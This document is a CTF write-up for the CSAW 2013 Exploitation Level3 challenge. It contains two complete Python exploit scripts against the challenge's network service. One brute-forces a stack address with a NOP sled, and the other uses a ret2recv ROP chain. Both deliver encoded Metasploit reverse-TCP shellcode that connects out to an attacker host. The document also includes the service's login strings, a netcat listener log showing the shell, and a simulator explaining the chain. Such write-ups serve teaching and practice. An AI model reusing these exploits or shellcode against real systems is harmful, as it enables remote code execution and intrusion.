I don't know why I struggled so much with this problem.
Anyway, during the competition I only had one day for it, so I couldn't solve it.
But today an idea suddenly hit me and I went straight for the exploit.
ASLR: off (the service fork()s per connection)
NX: off (execstack reports X, i.e. an executable stack)
from struct import pack, unpack
from socket import *
import time
p = lambda x : pack("<I", x)          # 32-bit little-endian pack
up = lambda x : unpack("<I", x)[0]
#HOST = "128.238.66.217"              # CSAW server (the contest was already over)
HOST = "192.168.242.129"              # local VM running the binary
PORT = 34266
offset = 0x41c                        # distance from the start of the buffer to the saved ebp
# linux/x86/shell_reverse_tcp - 95 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LHOST=220.117.247.200, LPORT=12071,
# ReverseConnectRetries=5, ReverseAllowProxy=false,
# PrependSetresuid=false, PrependSetreuid=false,
# PrependSetuid=false, PrependSetresgid=false,
# PrependSetregid=false, PrependSetgid=false,
# PrependChrootBreak=false, AppendExit=false,
# InitialAutoRunScript=, AutoRunScript=
shellcode = ("\xd9\xcf\xd9\x74\x24\xf4\x5d\x33\xc9\xb1\x12\xba\x5c\xa8"
"\x72\xf6\x83\xed\xfc\x31\x55\x13\x03\x09\xbb\x90\x03\x80"
"\x60\xa3\x0f\xb1\xd5\x1f\xba\x37\x53\x7e\x8a\x51\xae\x01"
"\x78\xc4\x80\x3d\xb2\x76\xa9\x38\xb5\x1e\xf6\xce\xb2\x16"
"\x6e\x33\x3d\x89\x48\xba\xdc\x65\xf0\xec\x4f\xd6\x4e\x0f"
"\xf9\x39\x7d\x90\xab\xd1\x51\xbe\x38\x49\xc6\xef\xdc\xe0"
"\x78\x79\xc3\xa0\xd7\xf0\xe5\xf4\xd3\xcf\x66")
def exploit(addr):
    exploit = "\x90" * 0x384                     # nop sled
    exploit += shellcode
    exploit += "\x90" * (offset - len(exploit))  # pad up to the saved ebp
    exploit += p(addr) * 2                       # saved ebp + eip: the guessed stack address
    return exploit
print "[*] CSAW Exploitation Level3 Exploit" # by sweetchip
print "[*] Start brute force."
# walk the stack downward, 0x200 per attempt (the nop sled is 0x384 bytes, so no address is skipped)
for i in range(0xbf879000, 0xbf000000, -0x200):
    s = socket(AF_INET,SOCK_STREAM)
    s.connect((HOST,PORT))
    print hex(i)
    s.recv(4096)
    s.recv(4096)
    s.send("csaw2013")      # login sequence that leads to the bof
    s.recv(4096)
    s.send("S1mplePWD")
    s.recv(4096)
    s.send("-1")            # length field
    s.send(exploit(i))      # the oversized payload overflows the stack buffer
raw_input("\ngive me shell! > ")
It gets a shell by brute forcing, but that was a bit slow, so I set the address range by hand when writing it.
Since it was outside the competition hours, I couldn't do it against the CSAW server and solved it locally :(
///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
New solution
from struct import pack, unpack
from socket import *
import time
p = lambda x : pack("<I", x)          # 32-bit little-endian pack
up = lambda x : unpack("<I", x)[0]
HOST = "192.168.0.109"
PORT = 34266
# linux/x86/shell_reverse_tcp - 95 bytes
# http://www.metasploit.com
shellcode = ("\xd9\xcf\xd9\x74\x24\xf4\x5d\x33\xc9\xb1\x12\xba\x5c\xa8"
"\x72\xf6\x83\xed\xfc\x31\x55\x13\x03\x09\xbb\x90\x03\x80"
"\x60\xa3\x0f\xb1\xd5\x1f\xba\x37\x53\x7e\x8a\x51\xae\x01"
"\x78\xc4\x80\x3d\xb2\x76\xa9\x38\xb5\x1e\xf6\xce\xb2\x16"
"\x6e\x33\x3d\x89\x48\xba\xdc\x65\xf0\xec\x4f\xd6\x4e\x0f"
"\xf9\x39\x7d\x90\xab\xd1\x51\xbe\x38\x49\xc6\xef\xdc\xe0"
"\x78\x79\xc3\xa0\xd7\xf0\xe5\xf4\xd3\xcf\x66")
freespace = 0x0804b000 # rwx page: recv() writes the shellcode here, then we return into it
recv = 0x08048890      # recv() in the binary
pr = 0x08048943        # pop; ret gadget
offset = 0x41c         # distance from the start of the buffer to the saved ebp
print "[*] CSAW Exploitation Level3 Exploit" # by sweetchip
s = socket(AF_INET,SOCK_STREAM)
s.connect((HOST,PORT))
print s.recv(4096)
print s.recv(4096)
s.send("csaw2013")
print s.recv(4096)
s.send("S1mplePWD")
print s.recv(4096)
s.send("-1")
print s.recv(4096)
time.sleep(1)
payload = "A"*(0x41c+4)      # buffer + saved ebp
payload += p(recv)           # return into recv(fd, buf, len, flags)
payload += p(pr)             # recv's return address: pop; ret
payload += p(4)              # fd  (the client socket in the forked child) - popped by the gadget
payload += p(freespace)      # buf (rwx) - the gadget's ret lands here, on the received shellcode
payload += p(len(shellcode)) # len
payload += p(0)              # flags
s.send(payload)
s.send(shellcode)            # stage 2: recv() writes this into freespace, then execution returns into it
raw_input("\ngive me shell! > ")
"""
C:\Users\Administrator>nc -lvp 12071
listening on [any] 12071 ...
192.168.0.1: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [192.168.0.93] from (UNKNOWN) [192.168.0.1] 51765: NO_DATA
whoami
sweetchip
"""
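Why a single `pop; ret` is enough for a four-argument recv() call is easiest to see by replaying the overwritten stack. The following is an added example (Python 3, not the write-up's own code): it builds the stage-1 payload from the addresses used above and walks the chain the way the CPU's `ret` and `pop` would. The fd value 4 is the one the write-up passes and is assumed here, not derived.

```python
import struct

# Values from the write-up's second exploit (level3 binary, ASLR and NX off).
OFFSET = 0x41c          # bytes from the start of the buffer to the saved ebp
RECV = 0x08048890       # recv() in the binary
POP_RET = 0x08048943    # pop <reg>; ret gadget
FREESPACE = 0x0804b000  # rwx page that recv() fills with the stage-2 shellcode
FD = 4                  # client socket fd in the forked child (assumed, as in the write-up)


def p32(x):
    return struct.pack("<I", x)


def u32(b):
    return struct.unpack("<I", b)[0]


def build_ret2recv(shellcode_len, offset=OFFSET, recv=RECV, pop_ret=POP_RET,
                   fd=FD, dest=FREESPACE):
    """Stage-1 payload: pad past the saved ebp, then a chain that returns into
    recv(fd, dest, shellcode_len, 0).  recv() returns into pop;ret: the pop
    throws away fd, and the ret consumes dest as if it were a return address,
    so execution continues at the buffer recv() just filled."""
    chain = [recv, pop_ret, fd, dest, shellcode_len, 0]
    return b"A" * (offset + 4) + b"".join(p32(v) for v in chain)


def simulate_return(payload, offset=OFFSET, recv=RECV, pop_ret=POP_RET):
    """Replay the control flow on the overwritten stack, using a word index as esp:
    'ret' pops one dword into eip, 'pop' discards one dword.  Returns the
    arguments recv() would see, the address the chain finally jumps to, and
    whatever is left on the stack afterwards."""
    stack = payload[offset + 4:]
    if len(stack) % 4:
        raise ValueError("chain is not dword aligned")
    words = [u32(stack[i:i + 4]) for i in range(0, len(stack), 4)]
    esp = 0
    eip = words[esp]; esp += 1            # ret from the overflowed function
    if eip != recv:
        raise ValueError("chain does not start at recv: %#x" % eip)
    # Inside recv: [esp] is its return address, [esp+4..esp+16] are fd, buf, len, flags.
    recv_args = tuple(words[esp + 1:esp + 5])
    eip = words[esp]; esp += 1            # recv returns
    if eip != pop_ret:
        raise ValueError("recv does not return into pop;ret: %#x" % eip)
    esp += 1                              # pop: discards fd
    eip = words[esp]; esp += 1            # ret: eip = buf, i.e. the received shellcode
    return {"recv_args": recv_args, "final_eip": eip, "leftover": words[esp:]}


if __name__ == "__main__":
    payload = build_ret2recv(95)  # 95 = length of the metasploit reverse shell above
    trace = simulate_return(payload)
    print("recv(fd=%d, buf=%#x, len=%d, flags=%d)" % trace["recv_args"])
    print("final eip: %#x" % trace["final_eip"])
    print("left on stack: %r" % trace["leftover"])
```

Running it shows the chain calling recv(4, 0x804b000, 95, 0) and then landing at 0x804b000. Only the first argument has to be popped because the second one is exactly where we want to land; len and flags are simply left on the stack, which is harmless since nothing returns past the shellcode.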